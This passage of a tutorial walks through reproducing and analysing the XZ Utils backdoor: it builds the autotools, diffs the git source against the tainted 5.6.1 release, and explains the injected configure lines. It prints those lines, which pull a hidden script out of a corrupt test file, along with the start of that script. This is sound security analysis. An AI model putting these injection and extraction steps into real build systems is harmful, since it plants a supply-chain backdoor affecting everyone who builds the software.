(outlined in red)](https://hackmd.io/_uploads/Hybj7gkg0.png "Screenshot of the \"Latest News\" section of the GNU Automake project page")
We can now proceed to verify the 1.16.5 GNU Automake source archive:
```bash
gpg_opts=(
# Verify the authenticity of the automake-1.16.5.tar.xz file using
# the detached PGP signature file automake-1.16.5.tar.xz.sig(and the
# signer's PGP public key in your keyring)
--verify automake-1.16.5.tar.xz.sig automake-1.16.5.tar.xz
)
gpg "${gpg_opts[@]}"
```
:::info
**Note:**
As mentioned in the [Verify the authenticity of the tainted XZ Utils
release archive](#Verify-the-authenticity-of-the-tainted-XZ-Utils-release-archive)
section, the following output line indicate that the PGP-signed file is
verified successfully:
```text
gpg: Good signature from "DISPLAY NAME <EMAIL-ADDRESS>" [*]
```
:::
We can now proceed to extract the GNU Automake source archive, run the
following command to do so:
```bash
tar_opts=(
# Specify to uncompress and extract the specified archive
--extract
--file automake-1.16.5.tar.xz
)
tar "${tar_opts[@]}"
```
Now we can try building the Automake from source. As the build
configuration program(automake-1.16.5/configure) will create build files
in your working directory let's switch the working directory into the
GNU Autoconf 1.16.5 source directory to avoid writing files outside of
it:
```bash
cd automake-1.16.5
```
Then we can iteratively run the build configuration program to satify
the build requirement and finally, generate the Makefile to actually
build and install the software. Run the following command to do so:
```bash
./configure
```
If you see the following output, the build configuration should be
completed without errors:
```output
configure: creating ./config.status
config.status: creating Makefile
config.status: creating pre-inst-env
```
:::info
**Note:**
The build configuration program does printed some warning messages,
however all of them seemed to only affect with the automated software
testing of the GNU Automake software which we doesn't really need in
this tutorial so let's let them slide.
:::
Now we can start building the GNU Automake software by running the
following command:
```bash
number_of_cpu_threads="$(nproc)"
make_opts=(
# Speed-up the build process by using multiple process at the same
# time
--jobs="${number_of_cpu_threads}"
)
make "${make_opts[@]}"
```
if the command's exit status code is zero it means that the build is
successful. Run the following command right after the `make` command's
invocation to verify this:
```bash
echo "${?}"
```
Then run the following command to install the built GNU Automake
software to the system:
```bash
make install
```
After the installation of the GNU Automake software you should have the
`automake` command in your command search PATHs(/usr/local/bin). You
may check the version of the installation by running the following
command:
```bash
automake --version
```
Let's turn our heads back to the initial working directory as we have no
longer have business to do with the Automake source tree anymore:
```bash
cd /project
```
### GNU Libtool
The installation of [the GNU Libtool software](https://www.gnu.org/software/libtool/)
can be started by locating the download URL of the 2.4.7.4 release
archive...until you noticed that there's no such release version called 2.4.7.4:
![The Downloads section of the GNU Libtool home page shows that the latest released version is "2.4.7"](https://hackmd.io/_uploads/ryJnjNleR.png "The Downloads section of the GNU Libtool home page shows that the latest released version is \"2.4.7\".")
![The release package download website shows that the version of the latest release tarballs is also "2.4.7"](https://hackmd.io/_uploads/rJ_toVlxR.png "The release package download website shows that the version of the latest release tarballs is also \"2.4.7\".")
According to the full version string `2.4.7.4-1ec8f-dirty` we found earlier, it appears that the `.4` part of the GNU Libtool version string indicates the development revision that has deviated from the 2.4.7 release by 4 revisions and has the revision fingerprint 1ec8f. By searching the revisions committed to the repository after the 2.4.7 release and matching the revision fingerprints we can found that the GNU Libtool software that created the build system files seems to be based on [the "libtool: passthru '-Werror' flags" revision](https://git.savannah.gnu.org/cgit/libtool.git/commit/?id=1ec8fa2).
We can fetch the GNU Libtool source tree of this specific revision from [the upstream Git repository URL listed in the Clone section of the libtool.git Git repository summary page](https://git.savannah.gnu.org/cgit/libtool.git/) by running the following commands:
```bash
git_clone_opts=(
# Specify history fetch depth to 200 revisions from the default
# branch's tip revision
--depth=200
)
git clone "${git_clone_opts[@]}" \
https://git.savannah.gnu.org/git/libtool.git \
libtool-git
cd libtool-git
git checkout 1ec8fa2
```
:::info
**Note:**
If the following output is printed during the `git checkout` command, it indicates that your history fetch depth is too shallow:
```output
error: pathspec '1ec8fa2' did not match any file(s) known to git
```
you can retry the operation *after deepening the history fetch depth* by running the following command after switching your working directory to the libtool-git directory:
```bash
git_fetch_opts=(
# Specify history fetch depth to _more_revision_quantities_
# revisions from the default branch's tip revision
--depth=_more_revision_quantities_
)
git fetch "${git_fetch_opts[@]}"
```
:::
Now we can try building the GNU Libtool from source. Unfortunately, the INSTALL installation documentation doesn't exist in the source tree and [in the URL instructed in the GNU Libtool 1ec8fa2 revision README](http://git.savannah.gnu.org/cgit/libtool.git/tree/INSTALL):
![Screenshot of the portion of the 18c8fa2 revision GNU Libtool README document that mentions the INSTALL installation document(highlighted in yellow) and it's on-website URL(outlined in red)](https://hackmd.io/_uploads/rkzyndMlC.png "Screenshot of the portion of the 18c8fa2 revision GNU Libtool README document that mentions the INSTALL installation document and it's on-website URL")
![Screenshot of page of the supposedly-to-be the on-website GNU Libtool INSTALL document, which is an error message claiming "Path not found"](https://hackmd.io/_uploads/SJihhdGe0.png "Screenshot of page of the supposedly-to-be the on-website GNU Libtool INSTALL document, which is an error message claiming \"Path not found\"")
As a fallback option we refer to [the current revision of the GNU Libtool README documentation](https://git.savannah.gnu.org/cgit/libtool.git/tree/README.md), which now references [the existing INSTALL installation document of the GNU Automake software instead](https://git.savannah.gnu.org/cgit/automake.git/tree/INSTALL):
![A screenshot of the INSTALL document URL referenced by the current GNU Libtool software README document](https://hackmd.io/_uploads/SyRrkYGl0.png "A screenshot of the INSTALL document URL referenced by the current GNU Libtool software README document")
As the source build bootstrapping program(libtool-git/bootstrap) expects it to be run when your working directory is under the source tree be sure to change the working directory if you haven't done in the previous step by running the following command:
```bash
cd /project/libtool-git
```
Then run the source build bootstrpping program by running the following command:
```bash
test -f configure || ./bootstrap
```
which should print the following error messages, indicate that we haven't satisfy their source build bootstrpping prerequisites:
```output
bootstrap: error: Prerequisite 'help2man' not found. Please install it, or
bootstrap: 'export HELP2MAN=/path/to/help2man'.
bootstrap: error: Prerequisite 'makeinfo' not found. Please install it, or
bootstrap: 'export MAKEINFO=/path/to/makeinfo'.
```
To install the help2man prerequisite, we can run the following command to search the APT software package management system:
```bash
apt search help2man
```
, which reveals that there's a package that can be installed:
```output
Sorting... Done
Full Text Search... Done
help2man/jammy 1.49.1 amd64
Automatic manpage generator
```
However this isn't the case for the `makeinfo` prerequisite:
```output
root@cve-2024-3094:/project/libtool-git# apt search makeinfo
Sorting... Done
Full Text Search... Done
root@cve-2024-3094:/project/libtool-git#
```
Fortunately, we can locate which package provide this prerequisite by using the `apt-file` utility. First, install the utility by running the following command _as root_:
```bash
apt install apt-file
```
then, run the following command _as root_ to fetch the metadata required by `apt-file`'s operation:
```bash
apt-file update
```
We can then query the packages that provides the `makeinfo` utility by running the following command:
```bash
apt_file_search_opts=(
# Specify that the search pattern is a regular expression instead
# of a glob pattern
--regexp
)
apt-file search "${apt_file_search_opts[@]}" '/s?bin/makeinfo$'
```
According to the following `apt-file` command's output, we can confirm that the textinfo package provides the `makeinfo` command:
```
texinfo: /usr/bin/makeinfo
```
:::info
**Note:**
We can also use [the Ubuntu Packages Search website](https://packages.ubuntu.com/) to query the package that provides the specific file.
:::
We can now run the following command *as root* to install all the missing packages:
```bash
libtool_bootstrap_prerequisite_pkgs=(
help2man
texinfo
)
apt install "${libtool_bootstrap_prerequisite_pkgs[@]}"
```
We can now retry the source build bootstrpping program by running the following command:
```bash
test -f configure || ./bootstrap
```
If you see the following output then the bootstrapping process has completed successfully:
```output
bootstrap: Done. Now you can run './configure'.
```
:::info
**Note:**
If you're in an networking environment where the Internet access is only available via an HTTP proxy, the source build bootstrapping program will print the following error:
```output
Cloning into 'gnulib'...
fatal: unable to look up git.savannah.gnu.org (port 9418) (Temporary failure in name resolution)
```
You can run the following command to patch the gnulib submodule's repository address to workaround the problem:
```bash
current_timestamp="$(date +%Y%m%d-%H%M%S)"
sed_opts=(
# Modify the input file in-place, while saving a backup file with
# the current timestamp while doing so
--in-place=".orig.${current_timestamp}"
)
sed \
"${sed_opts[@]}" \
's@git://git.savannah.gnu.org/gnulib.git@https://git.savannah.gnu.org/git/gnulib.git@g' \
.gitmodules
```
:::
Then we can iteratively run the build configuration program to satify the build requirement and finally, generating the Makefile to actually build and install the software. Run the following command to do so:
```bash
./configure
```
First of all, the build configuration program complained about missing
C compiler:
```output
configure: error: no acceptable C compiler found in $PATH
```
which can be fixed by installing a compatible C compiler like GCC,
install it by running the following command _as root_:
```bash
apt install gcc
```
We can now retry the build confiugration program by running the following command:
```bash
./configure
```
This time the build configuration should be completed without errors
```output
...stripped...
config.status: executing tests/atconfig commands
config.status: executing depfiles commands
config.status: executing libtool commands
root@cve-2024-3094:/project/libtool-git# echo "${?}"
0
root@cve-2024-3094:/project/libtool-git#
```
Now we can start building the GNU Libtool software by running the following commands:
```bash
number_of_cpu_threads="$(nproc)"
make_opts=(
# Speed-up the build process by using multiple process at the same
# time
--jobs="${number_of_cpu_threads}"
)
make "${make_opts[@]}"
```
if the command's exit status code is zero it means that the build is successful. Run the following command right after the `make` command's invocation to verify this:
```bash
echo "${?}"
```
Then run the following command to install the built GNU Libtool software to the system:
```bash
make install
```
After the installation of the GNU Libtool software you should have the `libtool` command in your command search PATHs(/usr/local/bin). You may check the version of the installation by running the following command:
```bash
libtool --version
```
Let's run the following command to switch the working directory back to the initial one as we have no business to do with the GNU Libtool source tree anymore:
```bash
cd /project
```
### GNU Gettext
The installation of the 0.22.4 version of [the GNU Gettext software](https://www.gnu.org/software/gettext/)
can be started by locating the download URL of [the 0.22.4 version GNU Gettext release
archive](https://ftp.gnu.org/pub/gnu/gettext/gettext-0.22.4.tar.lz)
and [its respective PGP signature file](https://ftp.gnu.org/pub/gnu/gettext/gettext-0.22.4.tar.lz.sig)
and download them to the working directory using your web browser.
Then, as usual, verify that the release archive we downloaded are
actually made by one of the GNU Gettext project maintainers. We can
determine who have actually signed the release archive by running the
following commands:
```bash
gpg_opts=(
# Verify the authenticity of the gettext-0.22.4.tar.lz file using
# the detached PGP signature file gettext-0.22.4.tar.lz.sig(and the
# signer's PGP public key in your keyring which does not exist at
# the moment)
--verify gettext-0.22.4.tar.lz.sig gettext-0.22.4.tar.lz
)
gpg "${gpg_opts[@]}"
```
You should see the following error message from GnuPG:
```text
gpg: Signature made Mon Nov 20 04:56:11 2023 CST
gpg: using RSA key 9001B85AF9E1B83DF1BDA942F5BE8B267C6A406D
gpg: Can't check signature: No public key
```
The PGP signature can't be checked as we don't have the signer's public
key in our PGP keyring, we can retrieve the public key using the key's
ID from the previous output by running the following commands:
```bash
gpg_opts=(
# Specify the keyserver to fetch the public key from.
#
# GnuPG does have one set by Debian(hkps://keys.openpgp.org),
# , however, it doesn't work reliably during the writing of this
# tutorial thus the other popular one is used instead.
--keyserver keyserver.ubuntu.com
# Import the keys with the given keyIDs from a keyserver
--receive-keys 0x9001B85AF9E1B83DF1BDA942F5BE8B267C6A406D
)
gpg "${gpg_opts[@]}"
```
It should have the following output:
```output
gpg: key F5BE8B267C6A406D: public key "Bruno Haible (Open Source Development) <bruno@clisp.org>" imported
gpg: Total number processed: 1
gpg: imported: 1
```
:::info
**Note:**
If you still can't successfully retrieve the public key it might be the
connection has been blocked by your network's firewall, you could also
try using the `hkp://keyserver.ubuntu.com:80` keyserver which should get
through the hostile networking environment.
:::
As shown by [the GNU Gettext project group memberlist page](https://savannah.gnu.org/project/memberlist.php?group=gettext),
Bruno Haible <bruno@clisp.org> is indeed the one of the GNU
Gettext project maintainers, so the public key we've fetched here is
probably legit:
![Screenshot of the "Active members on duty" section of the GNU Gettext project
group member list page, group administrator Bruno Haible can be found in the list](https://hackmd.io/_uploads/Sys13WEl0.png "Screenshot of the \"Active members on duty\" section of the GNU Gettext project
group member list page, group administrator Bruno Haible can be found in the list")
We can now proceed to verify the 0.22.4 version of the GNU Gettext release archive:
```bash
gpg_opts=(
# Verify the authenticity of the gettext-0.22.4.tar.lz file using
# the detached PGP signature file gettext-0.22.4.tar.lz.sig(and the
# signer's PGP public key in your keyring)
--verify gettext-0.22.4.tar.lz.sig gettext-0.22.4.tar.lz
)
gpg "${gpg_opts[@]}"
```
:::info
**Note:**
As mentioned in the [Verify the authenticity of the tainted XZ Utils
release archive](#Verify-the-authenticity-of-the-tainted-XZ-Utils-release-archive)
section, the following output line indicate that the PGP-signed file is
verified successfully:
```text
gpg: Good signature from "DISPLAY NAME <EMAIL-ADDRESS>" [*]
```
:::
Before we extract the 0.22.4 version of the GNU Gettext release archive,
we need to install the required software to extract lzip-compressed tar
archive files(as depicted by the .lz filename extension) by running the
following commands _as root_:
```bash
lzip_decompress_dependency_pkgs=(
lzip
)
apt install "${lzip_decompress_dependency_pkgs[@]}"
```
We can now proceed to extract the 0.22.4 version of the GNU Gettext
release archive, run the following commands to do so:
```bash
tar_opts=(
# Specify to uncompress and extract the specified archive
--extract
--file gettext-0.22.4.tar.lz
)
tar "${tar_opts[@]}"
```
Now we can try building the 0.22.4 version of the GNU Gettext
software from source. According to the installation document
(gettext-0.22.4/INSTALL), the build procedure is similar to the
other GNU build system components, though the build configuration
program is already shipped in the release archive so we can directly
use that to configure our build.
As the build configuration program(gettext-0.22.4/configure)
will create build files in your working directory let's switch the
working directory into the GNU Gettext 0.22.4 source tree to avoid
writing files outside of it:
```bash
cd gettext-0.22.4
```
Then we can iteratively run the build configuration program to satify
the build requirement and finally, generate the Makefile to actually
build and install the software. Run the following command to do so:
```bash
./configure
```
if the command's exit status code is zero it means that the build
configuration is successful. Run the following command right after
the `./configure` command's invocation to verify it:
```bash
echo "${?}"
```
Now we can start building the GNU Gettext software by running the
following command:
```bash
number_of_cpu_threads="$(nproc)"
make_opts=(
# Speed-up the build process by using multiple process at the
# same time
--jobs="${number_of_cpu_threads}"
)
make "${make_opts[@]}"
```
if the command's exit status code is zero it means that the build is
successful. Run the following command right after the `make`
command's invocation to verify this:
```bash
echo "${?}"
```
Then run the following command to install the built GNU Gettext
software to the system:
```bash
make install
```
After the installation of the GNU Gettext software you should have
the `gettext` command in your command search PATHs(/usr/local/bin).
You may check the version of the installation by running the
following command:
```bash
gettext --version
```
Let's turn our heads back to the initial working directory as we
have no longer have business to do with the GNU Gettext source
tree anymore:
```bash
cd /project
```
## Generate the build system files
Now that the software dependencies are installed, let's start generate the build system files as in the project maintainers role.
As the XZ Utils autogen.sh program require us to have the working directory set to the checked-out source directory and for not polluting XZ Utils build artifacts outside of its directory, run the following command to make the working directory switch:
```bash
cd xz-git
```
...and run the following command to build the build system files:
```bash
./autogen.sh
```
which will errored with the following message:
```
po4a/update-po: The program 'po4a' was not found.
po4a/update-po: Translated man pages were not generated.
```
We can search for packages that provide the `po4a` program by using the aforementioned `apt-file` utility by running the following commands:
```bash
apt_file_search_opts=(
# Specify that the search pattern is a regular expression instead
# of a glob pattern
--regexp
)
apt-file search "${apt_file_search_opts[@]}" '/s?bin/po4a$'
```
Which should have the following output, indicating that there's a same-name package that provides such program:
```output
po4a: /usr/bin/po4a
```
We can satisfy the dependency by running the following commands _as root_:
```bash
apt install po4a
```
The next iteration of the `./autogen.sh` command prints the following error message:
```output
doxygen/update-doxygen: 'doxygen' command not found.
doxygen/update-doxygen: Skipping Doxygen docs generation.
```
which we can again, use the `apt-file` utility to locate the package that provides that program to install. We leave this step to you and simply satisfy the resulting dependency package by running the following command _as root_:
```bash
apt install doxygen
```
This time the `./autogen.sh` command invocation should have the following output, indicate that it has successfully generated all the files:
```output
Stripping JavaScript from Doxygen output...
+ cd ..
+ exit 0
```
Let's return to the initial working directory as the further operation don't need the current one by running the following command:
```bash
cd /project
```
## Comparing the difference between the clean source tree and the tainted release archive
According to [the oss-security mailing list discussion thread](https://www.openwall.com/lists/oss-security/2024/03/29/4), it is the build system files that is not in [the upstream Git repository](https://git.tukaani.org/?p=xz.git) that is modified to contain the logic to extract the malicious object code file from the test data.
For the ease of comparing differences, let's install a helper utility that supports plaintext data syntax highlighting: [bat: A cat(1) clone with wings](https://github.com/sharkdp/bat). We can install it by running the following commands _as root_:
```bash
apt install bat
```
:::info
**Note:**
Due to [a command name conflict](https://github.com/sharkdp/bat/issues/656) the `bat` command shipped in older versions of Debian and it's derivatives are renamed to `batcat`. To increase the interoperability with other GNU/Linux distributions let's rename it back to the upstream name by running the following commands _as root_:
```bash
dpkg_divert_opts=(
# Rename the file to /usr/bin/bat
--divert /usr/bin/bat
# Do the actual rename operation, as the package is already
# installed
--rename
# Add a new diversion for the package installed
# /usr/bin/batcat file
--add /usr/bin/batcat
)
dpkg-divert "${dpkg_divert_opts[@]}"
```
:::
We can generate the content differences between the checked-out 5.6.1 version from the Git repository and the potentially evil-actor prepared 5.6.1 version source tree and save it to a file by running the following commands:
```bash
diff_opts=(
# Use the unified diff format
--unified
# Exclude files that we aren't interested: #
# Software documentation
--exclude='ChangeLog'
--exclude='doc'
# Translation files
--exclude='*.po'
--exclude='*.pot'
--exclude='*.gmo'
--exclude='po4a'
# Git repository
--exclude='.git'
# Compare recursively between two directory trees
--recursive
)
# Generate the unified diff of the git versus released XZ Utils 5.6.1
# source tree, and redirect the output to the
# xz-vanilla-vs-tainted.diff diff file
diff "${diff_opts[@]}" xz-git xz-5.6.1 >xz-vanilla-vs-tainted.diff
```
Here's the [reference result](https://pastebin.com/dFg2a57n).
:::info
**Note:**
The `>_file_` part of the diff command is in [the output redirection
syntax of the Bash scripting language](https://www.gnu.org/software/bash/manual/html_node/Redirections.html#Redirecting-Output), which
saves the content from the standard output device of the command to
the specified _file_.
By using this feature we can avoid piping the output directly to the `bat` utility, which in this case won't be able to apply the syntax highlighting unless we explicitly specify what `--language` the input data is in.
:::
Then we can run the following commands to inspect the content differences:
```bash
bat xz-vanilla-vs-tainted.diff
```
you should be able to see the following output:
![Content difference inspection using the `bat` pager utility](https://hackmd.io/_uploads/rkdcnvIlR.png "Content difference inspection using the `bat` pager utility")
:::info
**Note:**
By default the `bat` utility will launch the `less` pager on data that is over a terminal size, thus the keybindings supported by the `less` pager can be used, including but not limited to the following:
* Press the `q` key to exit the pager program.
* Press the `g` key to jump to the first line of the file.
* Press the `G` key to jump to the last line of the file.
+ Key-in the number of lines to jump, then the `G` key to jump to the specific line(due to the additional formatting caused by `bat`, it may not be the exact line that you intend to jump).
+ Press the `↑` / `j` key to move down a line.
+ Press the `↓` / `k` key to move up a line.
+ Press the `Page Up(Pgup)` key to move up a page.
+ Press the `Page Down(Pgdown)` key to move up a page.
:::
## Extract the injected object file from the test file
For the content differences we can notice that the tainted XZ Utils
5.6.1 release source tree has its build configuration program and the
m4/build-to-host.m4 M4 macro file modified to contain suspicious
logic, where the former one is generated by the latter one by GNU
Autoconf.
Unfortunately, we aren't experts in reading M4 macros so we shall temporary put them aside and only analyse the resulting build
configuration program as it is in a much readable bourn shell compatible shell script format. Let's analyse the build configuration script in a top-to-down manner.
:::info
**Note: About the unified diff format:**
* The lines started with `--- ` indicate the file before the
modification.
* The lines started with `+++ ` indicate the file after the
modification.
* The lines started with `@@ ` marks a start of a _hunk_(and the end of a previous hunk, if exists).
+ The integer pairs in the hunk marker lines indicate the beginning line number and line count of the hunk in the file, where the one prepended by a hyphen-minus character(`-`) indicate the file before modification and the one prepended by a plus character(`+`) indicate the file after modification
* The hunk lines started with a space character(` `) indicate the lines aren't changed between the modification.
* The hunk lines started with a plus character(`+`) indicate the lines are inserted after the modification.
* The hunk lines started with a hyphen-minus character(`-`) indicate the lines are removed after the modification.
Take the following diff hunk as an example:
```diff
--- xz-git/build-aux/config.sub 2024-04-11 22:31:56.587698017 +0800
+++ xz-5.6.1/build-aux/config.sub 2024-03-09 16:16:40.000000000 +0800
@@ -1748,7 +1753,8 @@
| skyos* | haiku* | rdos* | toppers* | drops* | es* \
| onefs* | tirtos* | phoenix* | fuchsia* | redox* | bme* \
| midnightbsd* | amdhsa* | unleashed* | emscripten* | wasi* \
- | nsk* | powerunix* | genode* | zvmoe* | qnx* | emx* | zephyr*)
+ | nsk* | powerunix* | genode* | zvmoe* | qnx* | emx* | zephyr* \
+ | fiwix* )
;;
# This one is extra strict with allowed versions
sco3.2v2 | sco3.2v[4-9]* | sco5v6*)
```
This diff hunk featuring line 1748 to 1754 of the xz-git/build-aux/config.sub(7 lines in total, including the line 1751 which is removed after modification), corresponding to line 1753 to 1760 of the xz-5.6.1/build-aux/config.sub file(8 lines in total, including the line 1756 and 1757 which are inserted after modification).
Refer [Detailed Description of Unified Format | GNU Diffutils manual](https://www.gnu.org/software/diffutils/manual/html_node/Detailed-Unified.html#Detailed-Description-of-Unified-Format) for more information.
:::
:::info
**Note:**
In case you need another terminal window to read the full file, you can get another container shell by run the following command _as root_ in a separate terminal window:
```bash
docker_exec_opts=(
# Allow bash interactive mode to properly function
--interactive
--tty
)
bash_opts=(
# Launch a login shell that reads the user's configuration files
--login
)
docker exec "${docker_exec_opts[@]}" cve-2024-3094 \
bash "${bash_opts[@]}"
```
:::
Let's examine the next hunk of the build configuration program:
```diff
@@ -18683,8 +18683,16 @@
+ gl_am_configmake=`grep -aErls "#{4}[[:alnum:]]{5}#{4}$" $srcdir/ 2>/dev/null`
+ if test -n "$gl_am_configmake"; then
+ HAVE_PKG_CONFIGMAKE=1
+ else
+ HAVE_PKG_CONFIGMAKE=0
+ fi
+
gl_sed_double_backslashes='s/\\/\\\\/g'
gl_sed_escape_doublequotes='s/"/\\"/g'
+ gl_path_map='tr "\t \-_" " \t_\-"'
gl_sed_escape_for_make_1="s,\\([ \"&'();<>\\\\\`|]\\),\\\\\\1,g"
gl_sed_escape_for_make_2='s,\$,\\$$,g'
case `echo r | tr -d '\r'` in
```
The 18686 line assigns the `gl_am_configmake` variable with the standard output of the following command:
```bash
grep -aErls "#{4}[[:alnum:]]{5}#{4}$" $srcdir/ 2>/dev/null
```
:::info
**Note:**
The <code>`_command_`</code> portion of the command is in [the aforementioned Bash scripting language's _command substitution_ syntax](https://www.gnu.org/software/bash/manual/html_node/Command-Substitution.html), but is a deprecated format of `$(command)`.
:::
We can expand the command as the following commands:
```bash
# Seems to be expanded to the source tree directory's path
srcdir=xz-5.6.1
grep_opts=(
# -a: Process a binary file as if it were text
--text
# -E: Specify the search pattern is an extended regular
# expression(ERE)
--extended-regexp
# -r: Read and process all files in the specified directory
# recursively
--recursive
# -l: Suppress normal output, only print the name of the input
# file that have successfully matched the specified search
# pattern
--files-with-matches
# -s: Suppress error messages regarding nonexistent or unreadable
# files
--no-messages
)
grep "${grep_opts[@]}" "#{4}[[:alnum:]]{5}#{4}$" $srcdir/ 2>/dev/null
```
The `#{4}[[:alnum:]]{5}#{4}` (POSIX) extended regular expression matches any strings that has the following elements in the following
order:
1. 4 consecutive pound signs(`#{4}`)
2. 5 consecutive characters that is in the set of alphabet letters and numbers(`[[:alnum:]]{5}`)
3. 4 consecutive pound signs(`#{4}`)
Running the command will reveal the assigned variable value to be:
```output
xz-5.6.1/tests/files/bad-3-corrupt_lzma2.xz
```
This is already alarming as the software testing data file shouldn't
have business to do with the software build itself.
The `if` block at line 18687~18691 checks whether the
`gl_am_configmake` variable is a non-null string(whether the grep
command can match the special search pattern in the software source
tree) and assigns the `HAVE_PKG_CONFIGMAKE` variable to 1 when it is.
This is likely to avoid the build configuration program errors when
the maliciously crafted test data does not exist in the source tree
for any reason (like the file being removed in a future time), which
may attract people's attention.
:::info
**Note:**
People that is familiar with the build configuration program generated by GNU Autoconf may notice that the `if` condition uses a test feature (`-n`) that is not normally used in a build configuration program due to shell compatibility(we will notice the proper way to do so in the following sections). This increases the suspiciousness of the change.
:::
The line 18695 assigns the `tr "\t \-_" " \t_\-"` string to the
`gl_path_map` variable, which seems to be a `tr` command camouflaged
to translate some data using the following rules:
* Replace the tab character(`\t`) to a space character.
* Replace the space character(` `) to a tab character.
* Replace the hyphen-minus character(`\-`) to a underscore character.
* Replace the underscore character to a hyphen-minus character.
Then, for the following difference hunk:
```diff
@@ -19875,6 +19883,7 @@
gl_final_localedir="$localedir"
+ gl_localedir_prefix=`echo $gl_am_configmake | sed "s/.*\.//g"`
case "$build_os" in
cygwin*)
case "$host_os" in
```
The *wrongly indented* 19886 line:
```bash
gl_localedir_prefix=`echo $gl_am_configmake | sed "s/.*\.//g"`
```
assigns the `gl_localedir_prefix` variable to the output of the following command:
```bash
echo $gl_am_configmake | sed "s/.*\.//g"
```
, which, after the parameter expansion and quotre, becomes:
```bash
echo xz-5.6.1/tests/files/bad-3-corrupt_lzma2.xz | sed "s/.*\.//g"
```
This command essentially calls the `sed` plaintext data manipulation
utility to do a search & replace:
* Search all occurrences that matches the `.*\.` basic regular expression.
+ The `.*` basic regular expression pattern matches _zero or more_ occurrences of the `.` RE pattern(which matches any single character).
+ The `\.` basic regular expression pattern matches a literal `.` character.
* Replace matched occurrences to a null string(essentially removing them).
, which filters out the `xz` filename extension portion from
the `xz-5.6.1/tests/files/bad-3-corrupt_lzma2.xz` filename, as you can
noticed in the later section it is a sneaky way to insert the `xz`
command call.
:::info
**Note:**
The `\.` substring in the `"s/.*\.//g"` double-quoted string expands
to literal `\.` instead of `.` due to the following behaviors
documented in the Bash reference manual:
* The backslash retains its special meaning only when followed by one
of the following characters: ‘$’, ‘\`’, ‘"’, ‘\\’, or _newline_.
* Within double quotes, backslashes that are followed by one of these characters are removed. *Backslashes preceding characters without a special meaning are left unmodified.*
:::
Let's examine the next hunk of the build configuration program, which strangely features a big chunk of blank lines:
```diff
@@ -19891,6 +19900,34 @@
if test "$localedir_c_make" = '\"'"${gl_final_localedir}"'\"'; then
localedir_c_make='\"$(localedir)\"'
fi
+ if test "x$gl_am_configmake" != "x"; then
+ gl_localedir_config='sed \"r\n\" $gl_am_configmake | eval $gl_path_map | $gl_localedir_prefix -d 2>/dev/null'
+ else
+ gl_localedir_config=''
+ fi
...stripped...
+ ac_config_commands="$ac_config_commands build-to-host"
localedir="${gt_save_localedir}"
```
The 19903~19907 `if` block checks whether the `gl_am_configmake` variable's value is not a null string(essentially the `-n` option of the `test` command used in the aforementioned hunk).
:::info
**Note:**
This is what a GNU Autoconf-generated build configuration program
would normally do in order to check whether a string is not null, as
opposed to using the `-n` command-line option of the `test` builtin
command mentioned previously.
:::
When the variable's value is not a null string, it sets the `gl_localedir_config` variable to the following single-quoted string:
```bash!
sed \"r\n\" $gl_am_configmake | eval $gl_path_map | $gl_localedir_prefix -d 2>/dev/null
```
We'll keep this string unprocessed for now until it is actually evaluated by the shell interpreter.
The 19930 line appends the ` build-to-host` string to the
`ac_config_commands` variable, which, seems to be define a GNU
Autoconf build configuration command that will be run at the end of
the build configuration. I'm not entirely sure what effect does it create so let's just leave this one at the moment.
For the next diff hunk:
```diff
@@ -23884,6 +23921,11 @@
enable_dlopen_self_static='`$ECHO "$enable_dlopen_self_static" | $SED "$del
ay_single_quote_subst"`'
old_striplib='`$ECHO "$old_striplib" | $SED "$delay_single_quote_subst"`'
striplib='`$ECHO "$striplib" | $SED "$delay_single_quote_subst"`'
+gl_path_map='`$ECHO "$gl_path_map" | $SED "$delay_single_quote_subst"`'
+gl_localedir_prefix='`$ECHO "$gl_localedir_prefix" | $SED "$delay_single_qu
ote_subst"`'
+gl_am_configmake='`$ECHO "$gl_am_configmake" | $SED "$delay_single_quote_subst"`'
+localedir_c_make='`$ECHO "$localedir_c_make" | $SED "$delay_single_quote_subst"`'
+gl_localedir_config='`$ECHO "$gl_localedir_config" | $SED "$delay_single_quote_subst"`'
LD_RC='`$ECHO "$LD_RC" | $SED "$delay_single_quote_subst"`'
reload_flag_RC='`$ECHO "$reload_flag_RC" | $SED "$delay_single_quote_subst"`'
reload_cmds_RC='`$ECHO "$reload_cmds_RC" | $SED "$delay_single_quote_subst"`'
```
The 23924~23928 line do some sort of the translation to the content of the previously defined variables using an sed expression that is defined in the line 8403~8404 as the following:
```bash
# Sed substitution to delay expansion of an escaped single quote.
delay_single_quote_subst='s/'\''/'\'\\\\\\\'\''/g'
```
After the script interpreter's [escape character interpretation](https://www.gnu.org/software/bash/manual/html_node/Escape-Character.html) and [quote removal](https://www.gnu.org/software/bash/manual/html_node/Quote-Removal.html) the actual sed expression can be determined to be:
```sed
s/'/'\\\''/g
```
According to [the `s` command section of the GNU sed manual](https://www.gnu.org/software/sed/manual/html_node/The-_0022s_0022-Command.html#The-_0022s_0022-Command), only the `\\` substring in the _replacement_ portion of the `s` sed command is treated as a escape sequence and is interpreted as a single backslash character(`\`). As the result the sed expression will search for every occurrences of the single-quote character in each input line and replacing it to `'\\''`
This operation seems to be GNU Autoconf workarounding the shell interpreter behaviors and is not related to the backdoor itself, we'll ignore it as of now.
Line 19896 assigns the value of the `gl_localedir_config` to the following command:
which seems to be a shell command pipeline that can be further expanded to:
```bash
sed \"r\n\" xz-5.6.1/tests/files/bad-3-corrupt_lzma2.xz \
| tr "\t \-_" " \t_\-" \
| xz -d 2>/dev/null
```
I won't able to figure out what the weird `sed` command do so I simply look it up for now. According to [Daniel Feldman](https://x.com/d_feldman/status/1777018755270238652) the `sed` command is essentially a disguised `cat` that simply outputs the content of the bad-3-corrupt_lzma2.xz file to the rest of the pipeline, which does the aforementioned character translation and decompress the result using the `xz` utility.
What does it extracts to? A shell script!
```bash
####Hello####
#�U��$�
[ ! $(uname) = "Linux" ] && exit 0
[ ! $(uname) = "Linux" ] && exit 0
[ ! $(uname) = "Linux" ] && exit 0
[ ! $(uname) = "Linux" ] && exit 0
[ ! $(uname) = "Linux" ] && exit 0
eval `grep ^srcdir= config.status`
if test -f ../../config.status;then
eval `grep ^srcdir= ../../config.status`
srcdir="../../$srcdir"
fi
